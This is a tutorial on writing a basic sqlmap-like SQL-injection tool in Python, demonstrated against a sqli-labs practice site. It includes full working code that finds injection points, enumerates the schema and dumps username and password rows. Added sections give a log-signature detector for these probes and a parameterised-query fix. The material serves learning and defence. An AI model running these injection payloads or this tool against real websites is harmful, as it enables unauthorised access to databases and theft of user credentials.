Getting started in network security --- building a simple sqlmap

Background

I have been studying network security for a while. Having grown used to tools written by other people, I decided to write a simple entry-level tool of my own to use for practice.

Demo run

  1. Use a sqli-labs range as the test site.

[Screenshot: Getting started in network security --- building a simple sqlmap]

  2. Get its URL: https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1

  3. Run the program.

[Screenshot: Getting started in network security --- building a simple sqlmap]

Code walkthrough

  1. First check whether the site is injectable: close the parameter with a single or double quote, then compare a true and a false boolean condition.
def can_inject(text_url):
    # Try closing the parameter with a single quote (%27) or a double quote (%22),
    # then compare the page for a true condition (and 1=1) with the page for a
    # false one (and 1=2). The target prints "Login" only when a row matched and
    # leaves its third <font> empty when nothing matched.
    text_list = ["%27", "%22"]
    for item in text_list:
        target_url1 = text_url + item + "%20and%201=1%20--+"
        target_url2 = text_url + item + "%20and%201=2%20--+"
        result1 = send_request(target_url1)
        result2 = send_request(target_url2)
        soup1 = BeautifulSoup(result1, 'html.parser')
        fonts1 = soup1.find_all('font')
        content1 = str(fonts1[2].text) if len(fonts1) > 2 else ''
        soup2 = BeautifulSoup(result2, 'html.parser')
        fonts2 = soup2.find_all('font')
        content2 = str(fonts2[2].text) if len(fonts2) > 2 else ''
        # Injectable when the true page shows a login and the false page shows nothing.
        if 'Login' in content1 and content2.strip() == '':
            log('使用' + item + "發現數據庫漏洞")
            return True, item
        log('使用' + item + "未發現數據庫漏洞")
    return False, None

  2. If an injection point was found, use order by to determine the number of columns.
def text_order_by(url, symbol):
    # Append "order by N" for increasing N. The first N that makes the page drop
    # its "Login" output is one past the real column count; the later steps all
    # iterate range(1, flag), so flag = columns + 1 is the value they expect.
    flag = 0
    for i in range(1, 100):
        log('正在查找字段' + str(i))
        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text) if len(fonts) > 2 else ''
        if 'Login' not in content:
            log('獲取字段成功 -> ' + str(i) + "個字段")
            flag = i
            break
    return flag

  3. Once the column count is known, use a union select to find which column positions are displayed on the page.
def text_union_select(url, symbol, flag):
    # Select the literal numbers 1..flag-1 with id=0 so that no real row is shown;
    # the number that appears in the page marks a displayed column, and the text
    # on either side of it (temp_list) is used later to cut results out of the page.
    prefix_url = get_prefix_url(url)
    cols = [str(i) for i in range(1, flag)]
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols) + "%20--+"
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    for i in range(1, flag):
        if str(i) in content:
            temp_list = content.split(str(i))
            return i, temp_list
    return None, None

  4. Identify the database engine from the page content: an invalid suffix is appended so the page echoes an error that names the engine.
def get_database(url, symbol):
    # Junk after the closing quote makes the target echo a database error whose
    # text contains the engine name.
    text_url = url + symbol + "aaaaaaaaa"
    result = send_request(text_url)
    if 'MySQL' in result:
        return "MySQL"
    if 'Oracle' in result:
        return "Oracle"
    return "Unknown"

  5. Get the table names.
def get_tables(url, symbol, flag, index, temp_list):
    # group_concat(table_name) goes in the displayed column (index); the other
    # columns keep their literal numbers so the union still lines up.
    prefix_url = get_prefix_url(url)
    cols = ["group_concat(table_name)" if i == index else str(i) for i in range(1, flag)]
    text_url = (prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols)
                + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+")
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    # Cut the value out from between the two text fragments found in step 3.
    return content.split(temp_list[0])[1].split(temp_list[1])[0]

  6. Get the column names.
def get_columns(url, symbol, flag, index, temp_list):
    # Column names of the users table; the table name is hard-coded, as in sqli-labs.
    prefix_url = get_prefix_url(url)
    cols = ["group_concat(column_name)" if i == index else str(i) for i in range(1, flag)]
    text_url = (prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols)
                + "%20from%20information_schema.columns%20where%20"
                + "table_name='users'%20and%20table_schema=database()%20--+")
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    return content.split(temp_list[0])[1].split(temp_list[1])[0]

  7. Get the column contents.
def get_data(url, symbol, flag, index, temp_list):
    # Every row as id:username:password (0x3a is ':'), rows separated by commas.
    prefix_url = get_prefix_url(url)
    cols = ["group_concat(id,0x3a,username,0x3a,password)" if i == index else str(i)
            for i in range(1, flag)]
    text_url = (prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols)
                + "%20from%20users%20--+")
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    return content.split(temp_list[0])[1].split(temp_list[1])[0]

  8. With the columns in hand, loop over the rows and print each one under the column headings.
# Runs inside sqlmap() after the steps above; assumes the three columns id, username, password.
datas = get_data(url, symbol, flag, index, temp_list).split(',')
temp = columns.split(',')
print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
for data in datas:
    temp = data.split(':')
    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))

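Seen from the target's side, steps 1 to 7 leave a distinctive trail in the web server's access log: a URL-encoded quote followed by a boolean tautology, a run of "order by N" requests from one client, then union selects that read information_schema and call group_concat. The detector below is an added example, not part of the original post or its tool. It parses constructed Apache-style log lines (the client IPs, timestamps and sizes are invented; the query strings mirror the walkthrough's probes), URL-decodes each request path so that %20 and + cannot hide a pattern, and tags requests that match those signatures. The signature names and the scan()/classify() functions are the example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined-style); IPs, timestamps and
# sizes are invented, the query strings follow the probes the tool above sends.
SAMPLE_LOG = """\
10.0.0.7 - - [03/Jun/2018:10:00:01 +0800] "GET /Less-1/index.php?id=1 HTTP/1.1" 200 1024
10.0.0.9 - - [03/Jun/2018:10:00:02 +0800] "GET /Less-1/index.php?id=1%27%20and%201=1%20--+ HTTP/1.1" 200 1024
10.0.0.9 - - [03/Jun/2018:10:00:02 +0800] "GET /Less-1/index.php?id=1%27%20and%201=2%20--+ HTTP/1.1" 200 512
10.0.0.9 - - [03/Jun/2018:10:00:03 +0800] "GET /Less-1/index.php?id=1%27%20order%20by%201--+ HTTP/1.1" 200 1024
10.0.0.9 - - [03/Jun/2018:10:00:03 +0800] "GET /Less-1/index.php?id=1%27%20order%20by%202--+ HTTP/1.1" 200 1024
10.0.0.9 - - [03/Jun/2018:10:00:04 +0800] "GET /Less-1/index.php?id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 1100
10.0.0.7 - - [03/Jun/2018:10:00:05 +0800] "GET /Less-1/index.php?id=2 HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+$'
)

# Signatures are applied to the URL-decoded, lower-cased, whitespace-collapsed path.
SIGNATURES = {
    "boolean_probe": re.compile(r"""['"]\s*(and|or)\s+\d+\s*=\s*\d+"""),
    "column_count_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_probe": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_read": re.compile(r"\binformation_schema\."),
    "row_dump": re.compile(r"\bgroup_concat\s*\("),
}


def normalize(path):
    """URL-decode the request path and collapse whitespace so that %20, + and
    repeated spaces all look the same to the signatures."""
    decoded = unquote_plus(path)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def classify(path):
    """Return the sorted list of signature names that match one request path."""
    text = normalize(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan(log_text):
    """Walk the log and return the tagged requests plus a per-client hit count;
    a single client accumulating several tags in a short span is the pattern
    of an automated enumeration rather than a stray malformed request."""
    alerts = []
    per_ip = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the scan
        tags = classify(m.group("path"))
        if tags:
            alerts.append({"ip": m.group("ip"), "tags": tags,
                           "path": normalize(m.group("path"))})
            per_ip[m.group("ip")] += 1
    return {"alerts": alerts, "per_ip": per_ip}


if __name__ == "__main__":
    report = scan(SAMPLE_LOG)
    for alert in report["alerts"]:
        print(alert["ip"], ",".join(alert["tags"]), alert["path"])
    print(dict(report["per_ip"]))
```

On the sample log the two baseline requests from 10.0.0.7 produce no tags, while the five probes from 10.0.0.9 are tagged boolean_probe, column_count_probe (twice) and then row_dump, schema_read and union_probe together on the information_schema query. Signature matching of this kind is only a first filter: it catches the literal patterns of this tool, not the encodings and comment tricks a more careful client could use, so it belongs in front of, not instead of, parameterised queries on the application side.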

Full code

### imitate_sqlmap.py
import sys
import time
import requests
from bs4 import BeautifulSoup


def log(content):
    # Timestamped console output used by every step.
    this_time = time.strftime('%H:%M:%S', time.localtime(time.time()))
    print("[" + str(this_time) + "]" + content)


def send_request(url):
    # Plain GET; the timeout stops a stalled target from hanging the whole run.
    res = requests.get(url, timeout=10)
    return str(res.text)


def can_inject(text_url):
    # Try closing the parameter with a single quote (%27) or a double quote (%22),
    # then compare the page for a true condition (and 1=1) with the page for a
    # false one (and 1=2). The target prints "Login" only when a row matched and
    # leaves its third <font> empty when nothing matched.
    text_list = ["%27", "%22"]
    for item in text_list:
        target_url1 = text_url + item + "%20and%201=1%20--+"
        target_url2 = text_url + item + "%20and%201=2%20--+"
        result1 = send_request(target_url1)
        result2 = send_request(target_url2)
        soup1 = BeautifulSoup(result1, 'html.parser')
        fonts1 = soup1.find_all('font')
        content1 = str(fonts1[2].text) if len(fonts1) > 2 else ''
        soup2 = BeautifulSoup(result2, 'html.parser')
        fonts2 = soup2.find_all('font')
        content2 = str(fonts2[2].text) if len(fonts2) > 2 else ''
        # Injectable when the true page shows a login and the false page shows nothing.
        if 'Login' in content1 and content2.strip() == '':
            log('使用' + item + "發現數據庫漏洞")
            return True, item
        log('使用' + item + "未發現數據庫漏洞")
    return False, None


def text_order_by(url, symbol):
    # Append "order by N" for increasing N. The first N that makes the page drop
    # its "Login" output is one past the real column count; the later steps all
    # iterate range(1, flag), so flag = columns + 1 is the value they expect.
    flag = 0
    for i in range(1, 100):
        log('正在查找字段' + str(i))
        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text) if len(fonts) > 2 else ''
        if 'Login' not in content:
            log('獲取字段成功 -> ' + str(i) + "個字段")
            flag = i
            break
    return flag


def get_prefix_url(url):
    # Everything up to the last "=", i.e. the URL including the parameter name
    # (".../index.php?id"); the callers append the value they want.
    return url.rsplit('=', 1)[0]


def text_union_select(url, symbol, flag):
    # Select the literal numbers 1..flag-1 with id=0 so that no real row is shown;
    # the number that appears in the page marks a displayed column, and the text
    # on either side of it (temp_list) is used later to cut results out of the page.
    prefix_url = get_prefix_url(url)
    cols = [str(i) for i in range(1, flag)]
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols) + "%20--+"
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    for i in range(1, flag):
        if str(i) in content:
            temp_list = content.split(str(i))
            return i, temp_list
    return None, None


def exec_function(url, symbol, flag, index, temp_list, function):
    # Put an SQL expression such as version() or database() in the displayed
    # column and read its value back from between the two fragments in temp_list.
    prefix_url = get_prefix_url(url)
    cols = [function if i == index else str(i) for i in range(1, flag)]
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols) + "%20--+"
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    return content.split(temp_list[0])[1].split(temp_list[1])[0]


def get_database(url, symbol):
    # Junk after the closing quote makes the target echo a database error whose
    # text contains the engine name.
    text_url = url + symbol + "aaaaaaaaa"
    result = send_request(text_url)
    if 'MySQL' in result:
        return "MySQL"
    if 'Oracle' in result:
        return "Oracle"
    return "Unknown"


def get_tables(url, symbol, flag, index, temp_list):
    # group_concat(table_name) goes in the displayed column (index); the other
    # columns keep their literal numbers so the union still lines up.
    prefix_url = get_prefix_url(url)
    cols = ["group_concat(table_name)" if i == index else str(i) for i in range(1, flag)]
    text_url = (prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols)
                + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+")
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    return content.split(temp_list[0])[1].split(temp_list[1])[0]


def get_columns(url, symbol, flag, index, temp_list):
    # Column names of the users table; the table name is hard-coded, as in sqli-labs.
    prefix_url = get_prefix_url(url)
    cols = ["group_concat(column_name)" if i == index else str(i) for i in range(1, flag)]
    text_url = (prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols)
                + "%20from%20information_schema.columns%20where%20"
                + "table_name='users'%20and%20table_schema=database()%20--+")
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    return content.split(temp_list[0])[1].split(temp_list[1])[0]


def get_data(url, symbol, flag, index, temp_list):
    # Every row as id:username:password (0x3a is ':'), rows separated by commas.
    prefix_url = get_prefix_url(url)
    cols = ["group_concat(id,0x3a,username,0x3a,password)" if i == index else str(i)
            for i in range(1, flag)]
    text_url = (prefix_url + "=0" + symbol + "%20union%20select%20" + ",".join(cols)
                + "%20from%20users%20--+")
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text) if len(fonts) > 2 else ''
    return content.split(temp_list[0])[1].split(temp_list[1])[0]


def sqlmap(url):
    log('歡迎來到SQL注入工具')
    log('正在進行SQL注入')
    result, symbol = can_inject(url)
    if not result:
        log('此網站不存在SQL漏洞,退出SQL注入')
        return False
    log('此網站存在SQL注入漏洞,請等待')
    flag = text_order_by(url, symbol)
    index, temp_list = text_union_select(url, symbol, flag)
    if index is None:
        # No column number was echoed back, so nothing can be read from the page.
        return False
    database = get_database(url, symbol)
    version = exec_function(url, symbol, flag, index, temp_list, 'version()')
    this_database = exec_function(url, symbol, flag, index, temp_list, 'database()')
    log('當前數據庫 -> ' + database.strip() + version.strip())
    log('數據庫名 -> ' + this_database.strip())
    tables = get_tables(url, symbol, flag, index, temp_list)
    log('數據表名 -> ' + tables.strip())
    columns = get_columns(url, symbol, flag, index, temp_list)
    log('數據列 -> ' + columns.strip())
    log('試圖得到全部列...')
    datas = get_data(url, symbol, flag, index, temp_list).split(',')
    temp = columns.split(',')
    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
    for data in datas:
        temp = data.split(':')
        print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
    return True


if __name__ == '__main__':
    # Usage: python imitate_sqlmap.py <url whose last query parameter is the one to test>
    sqlmap(sys.argv[1])

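Everything the script above does depends on one property of the target: the id parameter is spliced into the SQL text, so a quote inside it ends the literal and the remainder is executed as SQL. The following is an added example, not code from the post, showing that pattern next to its parameterised fix against an in-memory sqlite3 table (the rows are constructed). boolean_difference() reproduces the signal can_inject() relies on, a true condition and a false condition returning different results, and shows that it disappears once the value is bound as a parameter. The function names and sample rows are the example's own.

```python
import sqlite3

# Constructed rows standing in for the users table the script dumps; invented values.
SAMPLE_ROWS = [(1, "alice", "pw-one"), (2, "bob", "pw-two")]


def make_db():
    """In-memory database with a users(id, username, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The target's pattern: the raw parameter is formatted into the statement,
    so a quote in user_id closes the literal and the rest is parsed as SQL."""
    sql = "SELECT username, password FROM users WHERE id='%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised form: the driver passes user_id as a value, never as SQL
    text, so quotes and keywords inside it cannot alter the statement."""
    sql = "SELECT username, password FROM users WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_strict(conn, user_id):
    """Parameterise and validate the type: an id that is not an integer is
    rejected before any query is built, which also keeps the error path quiet."""
    try:
        ident = int(user_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT username, password FROM users WHERE id=?", (ident,)).fetchall()


def boolean_difference(lookup, conn, base="1"):
    """True when a tautology suffix and a contradiction suffix give different
    results; this is exactly the difference can_inject() looks for."""
    true_case = lookup(conn, base + "' and '1'='1")
    false_case = lookup(conn, base + "' and '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, boolean difference:", boolean_difference(lookup_vulnerable, db))
    print("parameterised, boolean difference:", boolean_difference(lookup_safe, db))
    print("strict lookup of '2':", lookup_strict(db, "2"))
```

With the vulnerable lookup the tautology returns alice's row and the contradiction returns nothing, so the probe sees a difference; with the bound parameter both inputs are compared as one opaque string against the integer id and return no rows, so there is nothing for the probe to distinguish. The strict variant adds type validation on top, which is the cheaper check to run first when the parameter is known to be numeric.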

Packaging as an executable with PyPI

Add the entry_points argument in the cfg file. entry_points is an interface that imitate_sqlmap registers through setuptools so that it can be called directly from outside. Register entry_points in imitate_sqlmap's setup.py as follows:

setup(
    name='imitate_sqlmap',
    entry_points={
        'imitate_sqlmap.api.sqlmap': [
            'databases=imitate_sqlmap.api.sqlmap.databases:main',
        ],
    },
)


This setup() call registers an entry_point belonging to the group imitate_sqlmap.api.sqlmap. Note that if several other, different packages also register entry_points under imitate_sqlmap.api.sqlmap, then when I look up entry_points through imitate_sqlmap.api.sqlmap I get every entry_point registered there.
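Two things are worth separating here. A group name of your own, such as imitate_sqlmap.api.sqlmap above, is a plugin registry: any installed distribution can add to it, and a lookup by group returns all of them, as the text says. An executable command on PATH comes from the reserved console_scripts group. The example below is added here and is not the post's setup.py; the package, module and function paths in it are assumptions. It keeps both groups in one entry_points dict and adds a discover() helper that queries the installed metadata for a group on both the older (dict-returning) and newer (select()-based) importlib.metadata APIs.

```python
from importlib import metadata

# Assumed package layout: imitate_sqlmap/api/sqlmap/databases.py defines main().
ENTRY_POINTS = {
    # Installing the package creates an `imitate-sqlmap` command that runs main().
    "console_scripts": [
        "imitate-sqlmap=imitate_sqlmap.api.sqlmap.databases:main",
    ],
    # Custom group: other distributions may register under it too, and a lookup
    # by this group name returns every registration, not only this package's.
    "imitate_sqlmap.api.sqlmap": [
        "databases=imitate_sqlmap.api.sqlmap.databases:main",
    ],
}


def discover(group):
    """Return {name: 'module:attr'} for every entry point installed under group,
    across all distributions. Handles both importlib.metadata generations."""
    eps = metadata.entry_points()
    if hasattr(eps, "select"):          # Python 3.10 and later
        selected = eps.select(group=group)
    else:                               # Python 3.8 / 3.9: plain dict of lists
        selected = eps.get(group, [])
    return {ep.name: ep.value for ep in selected}


def load_plugins(group):
    """Import the registered objects; one broken plugin is reported, not fatal."""
    loaded, failed = {}, {}
    eps = metadata.entry_points()
    selected = eps.select(group=group) if hasattr(eps, "select") else eps.get(group, [])
    for ep in selected:
        try:
            loaded[ep.name] = ep.load()
        except Exception as exc:  # ImportError, AttributeError from a bad target
            failed[ep.name] = repr(exc)
    return loaded, failed


if __name__ == "__main__":
    # setup.py usage: from setuptools import setup; setup(name="imitate_sqlmap",
    # packages=["imitate_sqlmap"], entry_points=ENTRY_POINTS)
    print(discover("imitate_sqlmap.api.sqlmap"))
```

Until the package is installed, discover("imitate_sqlmap.api.sqlmap") returns an empty dict; after installation it lists databases, and any third-party package that registers under the same group shows up alongside it, which is the behaviour the paragraph above describes.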
